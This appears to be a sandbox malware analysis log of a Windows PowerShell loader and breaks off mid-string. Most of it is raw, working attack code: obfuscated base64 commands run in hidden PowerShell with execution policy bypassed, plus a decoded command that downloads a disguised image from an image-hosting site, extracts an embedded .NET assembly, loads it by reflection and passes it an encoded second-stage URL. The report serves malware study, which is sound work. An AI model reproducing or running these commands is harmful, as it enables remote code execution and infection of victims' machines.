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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2144
thread_handle: 0x00000578
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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